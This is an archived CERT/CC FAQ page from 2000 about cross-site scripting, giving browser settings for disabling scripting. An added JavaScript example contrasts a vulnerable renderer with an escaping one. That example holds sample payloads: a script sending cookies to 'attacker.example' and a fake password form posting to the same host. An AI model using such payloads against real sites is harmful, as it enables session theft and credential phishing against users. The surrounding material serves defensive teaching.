<!DOCTYPE HTML PUBLIC "html.dtd">
<HTML>
<HEAD>
<TITLE>CERT/CC Malicious Web Scripts FAQ</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" VLINK="#C7AA05" LINK="#004A6B" ALINK="#DDB30B">
<!-- This section leaves a table definition open. -->
<!-- Each document must close it somewhere else. -->
<DIV ALIGN="left">
<TABLE WIDTH="100%" BORDER="0">
<TR>
<TD WIDTH="47" VALIGN="top">
<IMG SRC="http://www.cert.org/images/invisible.gif" WIDTH="47" ALT="" HEIGHT="1">
</TD>
<!-- This section opens the table cell that contains the gray side bar. -->
<!-- This table cell is closed at the end of sidebar include. -->
<!-- A new table cell is also begun at the end of the sidebar -->
<!-- The table cell, row, and table must be ended in the main document -->
<TD VALIGN="top">
<!-- starts new table cell for table begun in titlebar -->
</TD>
<TD WIDTH="100%" VALIGN="top">
<FONT FACE="Helvetica, Geneva, Arial">
<SMALL>
<H2>CERT<SUP>®</SUP> Coordination Center</H2>
<H1>Frequently Asked Questions About Malicious Web Scripts Redirected by
Web Sites</H1>
<P>
Original release date: February 2, 2000<BR>
Last updated: February 3, 2000<BR>
<HR NOSHADE SIZE="2" ALIGN="left">
<P>A problem has recently been identified that can be found on a wide
variety of web sites: what you receive from a web site may not be what
that site meant to send. If you click on a specially designed link,
the site may unknowingly send you bad data, unwanted pictures, and
programs (malicious scripts) to compromise your data.
<P>The problem is not with web browsers themselves but with how web
pages are constructed and how data entering and leaving web sites is
validated. "Validate" means ensuring no "unintended" characters are
sent back to the client.
<P>This document includes:
<OL TYPE="I">
<LI><A HREF="http://www.cert.org/tech_tips/malicious_code_FAQ.html#FAQ">Frequently Asked Questions</A>
<LI><A HREF="http://www.cert.org/tech_tips/malicious_code_FAQ.html#steps">Steps for Changing Your Options in Web Browsers</A>
</OL>
<HR NOSHADE SIZE="2" ALIGN="left">
<A NAME="FAQ"><H3>I. Frequently Asked Questions </H3></A>
<H4>How do malicious web scripts get to my web browser?</H4>
<P>An attacker may attach a script to something you send to a web site,
such as a URL, a field in a form, or a database query. If the site copies
that input into its response without checking it, the malicious script
comes back to you with the page, and your browser runs it as though the
site itself had written it.
<P>Among the ways you can potentially expose your web browser to
malicious scripts are these:
<UL>
<LI>following untrusted links in web pages, email messages, or
newsgroup postings
<LI>using interactive forms on an untrustworthy site
<LI>viewing dynamically generated pages that contain content
developed by anyone but yourself
</UL>
<P>You might link to what you consider a safe site, complete a form on
a site that is not trustworthy, or search a database there.
<H4>What might happen if my web browser is exposed to a malicious script?</H4>
<P>Among the possibilities are the capture of your password and other
information you believe is protected. You should also be concerned
because malicious scripts can be used to expose restricted parts of
your organization's local network (such as its intranet) to
attackers who are on the Internet.
<P>Attackers may also be able to use malicious scripts to write copies
of themselves into cookies. If such a cookie is later sent back to a
vulnerable web site, which passes its contents back to your browser,
the malicious script runs again. Note: this is not a vulnerability in
web cookies; rather, a malicious script takes advantage of the normal
functionality of cookies.
<H4>How can I avoid the problem? </H4>
<P>The most significant impact of this vulnerability can be avoided by
disabling all scripting languages. Follow the steps <A HREF="http://www.cert.org/tech_tips/malicious_code_FAQ.html#steps">below</A>
to turn off the options in your web browser that
allow malicious scripts to run. If you are not using a current version
of Netscape or Internet Explorer (version 4 and 5, respectively), you
might need to modify the steps.
<P>Note that even with scripting disabled, attackers may still be able
to alter the appearance of content provided by a legitimate site by
embedding other HTML tags. In particular, malicious use of the
&lt;FORM&gt; tag (for example, a form that looks like part of the site but
submits whatever you type to the attacker) is not prevented by disabling
scripting languages.
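<P>The following is an added example, not code from this FAQ or from the
CERT/CC. It puts the cases described above (a script carried in a link,
a script reflected from a cookie, and a markup-only &lt;FORM&gt; injection
that survives disabling scripting) through a toy page renderer, first as
the vulnerable site would build the page and then with the output
validation the FAQ calls for. The request objects, the cookie name, the
search field and the host "attacker.example" are constructed for the
illustration; escapeHtml is an assumed helper, not any vendor's
implementation.

```javascript
// Added example, not code from the CERT/CC FAQ or from any vendor named in it.
// Every URL, cookie name and request below is constructed for illustration;
// "attacker.example" is a placeholder host.

// A page template that copies client-supplied data (a query-string field and
// a cookie) straight into the HTML it sends back. This is the defect the FAQ
// describes: the site returns characters it never intended to send.
function renderVulnerable(req) {
  const name = req.cookies.name || 'guest';
  const q = req.query.q || '';
  return [
    '<html><body>',
    '<p>Hello, ' + name + '</p>',
    '<p>Results for: ' + q + '</p>',
    '</body></html>',
  ].join('\n');
}

// "Validate" in the FAQ's sense: before data goes back to the client, encode
// every character that would otherwise be read as markup. For text placed
// between tags, the five characters below are the ones that matter.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Same template, with every client-supplied value encoded on output.
function renderHardened(req) {
  const name = escapeHtml(req.cookies.name || 'guest');
  const q = escapeHtml(req.query.q || '');
  return [
    '<html><body>',
    '<p>Hello, ' + name + '</p>',
    '<p>Results for: ' + q + '</p>',
    '</body></html>',
  ].join('\n');
}

// Check: which tags in the response were not written by the template?
// Anything listed here came from the client, and the browser will act on it.
const TEMPLATE_TAGS = new Set(['html', 'body', 'p']);
function foreignTags(html) {
  const found = [];
  const tagRe = /<\/?([a-zA-Z][a-zA-Z0-9]*)/g;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const tag = m[1].toLowerCase();
    if (!TEMPLATE_TAGS.has(tag)) found.push(tag);
  }
  return found;
}

// Constructed requests, one per vector the FAQ names.
// 1. Script carried in a link the victim follows (query string).
const scriptViaUrl = {
  query: { q: '<script>document.location="http://attacker.example/?c="+document.cookie</script>' },
  cookies: {},
};
// 2. Markup only, no script: a fake login form pointing at the attacker's
//    host. Disabling scripting in the browser does nothing against this.
const formViaUrl = {
  query: { q: '<form action="http://attacker.example/login">Session expired, re-enter password: ' +
              '<input type="password" name="p"><input type="submit"></form>' },
  cookies: {},
};
// 3. Script that an earlier injection wrote into a cookie; the site reads
//    the cookie and reflects it on every later page.
const scriptViaCookie = {
  query: { q: 'harmless' },
  cookies: { name: '<script>alert(document.cookie)</script>' },
};

// For each constructed request: tags the client smuggled into the
// vulnerable page, and the (empty) list for the hardened page.
function report() {
  const cases = { scriptViaUrl, formViaUrl, scriptViaCookie };
  const out = {};
  for (const [label, req] of Object.entries(cases)) {
    out[label] = {
      vulnerable: foreignTags(renderVulnerable(req)),
      hardened: foreignTags(renderHardened(req)),
    };
  }
  return out;
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(report(), null, 2));
}
```

<P>Run it with Node (node example.js) to see, for each constructed request,
which tags reached the client from the vulnerable renderer and none from the
hardened one. The foreignTags check is a way to see the defect in a test, not
a defence: the encoding on output is what keeps the browser from treating
client data as markup, and it neutralizes the &lt;FORM&gt; case just as it
does the &lt;SCRIPT&gt; cases.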
<H4>How will turning off the options affect my use of the web?</H4>
<P>Turning off the options will keep you from being vulnerable to
malicious scripts. However, it will limit the interaction you can have
with some web sites. You may notice a difference in functionality when
you visit legitimate sites that use scripts running within the browser
to add useful features.
<A NAME="java"><H4>Should I disable Java applets?</H4></A>
<P>The risk associated with Java applets is significantly different
from some of the other technologies. Java has a robust security
mechanism designed to deal with situations like these that prevents
sensitive information from being disclosed or client information from
being damaged.
<P>However, Java applets written by an attacker can still be loaded
while you are viewing a legitimate web page. The problems that can
arise are similar to those involving the &lt;FORM&gt; and other HTML
tags. For example, an attacker could develop a "Trojan Horse" applet
that presented misleading information and prompted you for a password.
If you failed to recognize the malicious applet for what it was, you
could accidentally disclose sensitive information.
<P>You must make your own determination about disabling Java applets,
based on your tolerance for these risks. If you choose to disable
Java, please see the detailed <A HREF="http://www.cert.org/tech_tips/malicious_code_FAQ.html#steps">instructions</A> below.
<H4>Isn't there a better way to fix the problem?</H4>
<P>The CERT/CC is working with technology vendors and other security
experts on a long-term, comprehensive solution to the problem of
malicious scripts running on browsers.
<H4>Is there any more information available about this problem?</H4>
<P>The CERT/CC has published an advisory containing more details about
the problem, its impact, and ways to deal with it. CA-2000-02 is
available from
<UL>
<LI><A HREF="http://www.cert.org/advisories/CA-2000-02.html">http://www.cert.org/advisories/CA-2000-02.html</A>
</UL>
<P>You can also find information at the vendor URLs listed in the
advisory.
<P>The CERT/CC has also published a "tech tip" for web page developers
and web site administrators, which you might want to pass along to the
appropriate people in your organization. This document, "Malicious
Content Mitigation for Web Developers," is available from
<UL>
<LI><A HREF="http://www.cert.org/tech_tips/malicious_code_mitigation.html">http://www.cert.org/tech_tips/malicious_code_mitigation.html</A>
</UL>
<HR NOSHADE SIZE="2" ALIGN="left">
<A NAME="steps"><H3>II. Steps for Changing Your Options in Web
Browsers - Netscape and Internet Explorer </H3></A>
<H4>Using Netscape 3.0 or higher</H4>
<P><B>Note:</B> If you are not using Netscape version 3.0 or higher,
these instructions may not be correct. To determine your software
version, from the <B>Help</B> menu, select <B>About
Communicator... </B>. A web page appears with information about your
browser including the version number.
<OL>
<LI>Start Netscape Communicator as you would when browsing the
Internet.
<LI>From the <B>Edit</B> menu, select <B>Preferences</B>. The
Preferences dialog box appears.
<LI> From the <B>Category</B> list, click on <B>Advanced</B>. (Do NOT
click on the plus (+) sign.) The Advanced Preferences panel appears.
<LI> If you <A HREF="http://www.cert.org/tech_tips/malicious_code_FAQ.html#java">decide to disable java</A>, uncheck
<B>Enable Java</B>.
<LI> Uncheck <B>Enable JavaScript</B>.
<LI> Click <B>OK</B> to accept the changes.
<LI> Click the <B>Padlock Icon </B> in the lower left hand corner of
your browser. The Security Info dialog box appears.
<LI>Click the <B>Navigator</B> link from the list on the left. The
Navigator Security Settings panel appears.
<LI>In the <B>Show a warning before:</B> section, make sure the
options <B>Viewing a page with encrypted/unencrypted mix </B> and
<B>Leaving an encrypted site </B> are checked.
<LI>Click <B> OK </B> to accept the changes and close the dialog box.
</OL>
<H4>Using Internet Explorer 5</H4>
<P>
<B>Note:</B> If you are not using Internet Explorer version 5, these
instructions may not work correctly. To determine your software
version, from the <B>Help</B> menu, select <B>About Internet
Explorer... .</B> A dialog box appears with information about your
browser including the version number.
<OL>
<LI> Start Internet Explorer as you would when browsing the Internet.
<LI> From the <B>Tools</B> menu select <B>Internet
Options... </B>. The Internet Options dialog box appears.
<LI> Select the <B>Security</B> tab. The Security Options panel
appears.
<LI> Click on the <B>Internet</B> zone to select it.
<LI> Click the <B>Custom Level</B> button. The Security Settings panel
appears.
<LI> Select the <B>High</B> option from the pull-down list.
<LI> Click the <B>Reset</B> button. A dialog box appears asking if you
are sure you want to change the security settings for this zone.
<LI> Click <B>Yes</B>.
You now need to scroll through the settings list and make the changes
listed in the following steps.
<LI> For the setting <B>Scripting ActiveX controls marked safe for
Scripting</B>, check the radio button for <B>Disable</B> or
<B>Prompt</B> depending on your level of trust.
<LI> If you <A HREF="http://www.cert.org/tech_tips/malicious_code_FAQ.html#java">decide to disable
Java</A>, for the setting <B>Java permissions</B>, check the radio button
for <B>Disable Java</B>. Note: If you have Microsoft Virtual Machine installed, this
setting will be under the <B>Microsoft VM</B> section. If you do not
have a <B>Java permissions</B> setting, Java is already disabled.
<LI> For the setting <B>Active scripting</B> under the
<B>Scripting</B> section, check the radio button for <B>Disable</B>.
<LI> Click <B>OK</B> to accept these changes. A dialog box appears
asking if you are sure you want to make these changes.
<LI> Click <B>Yes</B>.
<LI>In the Internet Options dialog box, click the <B>Advanced </B>
tab. The Advanced Options panel appears.
<LI>Make sure the setting <B>Warn if changing between secure and
insecure</B> under the <B>Security</B> setting is checked.
<LI> Click <B>Apply</B> to save your changes.
<LI> Click <B>OK</B> to close the Internet Options dialog box.
</OL>
<HR WIDTH="100%" NOSHADE>
This document is available from:
<A HREF="http://www.cert.org/tech_tips/malicious_code_FAQ.html">
http://www.cert.org/tech_tips/malicious_code_FAQ.html</A>
<HR WIDTH="100%" NOSHADE>
<H2>CERT/CC Contact Information</H2>
<DL>
<DT><B>Email:</B> <A HREF="mailto:cert@cert.org">cert@cert.org</A><BR>
<B>Phone:</B> +1 412-268-7090 (24-hour hotline)<BR>
<B>Fax:</B> +1 412-268-6989<BR>
<B>Postal address:</B></DT>
<DD>
CERT<SUP>®</SUP> Coordination Center<BR>
Software Engineering Institute<BR>
Carnegie Mellon University<BR>
Pittsburgh PA 15213-3890<BR>
U.S.A.
</DD>
</DL>
CERT personnel answer the hotline 08:00-20:00 EST(GMT-5) / EDT(GMT-4)
Monday through Friday; they are on call for emergencies during other
hours, on U.S. holidays, and on weekends.
<P>
<H4>Using encryption</H4>
<P>We strongly urge you to encrypt sensitive information sent by
email. Our public PGP key is available from<P>
<UL>
<LI><A HREF="http://www.cert.org/CERT_PGP.key">http://www.cert.org/CERT_PGP.key</A>
</UL>
If you prefer to use DES, please call the CERT hotline for more
information.<P>
<H4>Getting security information</H4>
CERT publications and other security information are available from
our web site<P>
<UL>
<LI><A HREF="http://www.cert.org/">http://www.cert.org/</A>
</UL>
To be added to our mailing list for advisories and bulletins, send email to
<A HREF="mailto:cert-advisory-request@cert.org">
cert-advisory-request@cert.org</A> and include <TT>SUBSCRIBE
your-email-address</TT> in the subject of your message.
<P>
Copyright 1999 Carnegie Mellon University.<BR>
Conditions for use, disclaimers, and sponsorship information can be found in<P>
<UL>
<LI><A HREF="http://www.cert.org/legal_stuff.html">http://www.cert.org/legal_stuff.html</A>
</UL>
* "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office.
<HR WIDTH="100%" NOSHADE>
<B><U>NO WARRANTY</U></B><BR>
<B>Any material furnished by Carnegie Mellon University and the
Software Engineering Institute is furnished on an "as is"
basis. Carnegie Mellon University makes no warranties of any kind,
either expressed or implied as to any matter including, but not
limited to, warranty of fitness for a particular purpose or
merchantability, exclusivity or results obtained from use of the
material. Carnegie Mellon University does not make any warranty of any
kind with respect to freedom from patent, trademark, or copyright
infringement.</B>
<HR NOSHADE SIZE="2" ALIGN="LEFT">
<TABLE>
<TR>
<TD>
<A NAME="history"></A>
<FONT SIZE="3" FACE="Helvetica, Geneva, Arial">
Revision History
</FONT>
</TD>
</TR>
<TR>
<TD WIDTH="30%" VALIGN="TOP">
<FONT SIZE="2" FACE="Helvetica, Geneva, Arial">
Feb 2, 2000<BR>
</FONT>
</TD>
<TD WIDTH="70%" VALIGN="TOP">
<FONT SIZE="2" FACE="Helvetica, Geneva, Arial">
Initial Release<BR>
</FONT>
</TD>
</TR>
</TABLE>
</SMALL>
</FONT>
<HR NOSHADE SIZE="2" ALIGN="LEFT">
</TD>
</TR>
</TABLE>
</DIV>
</BODY>
</HTML>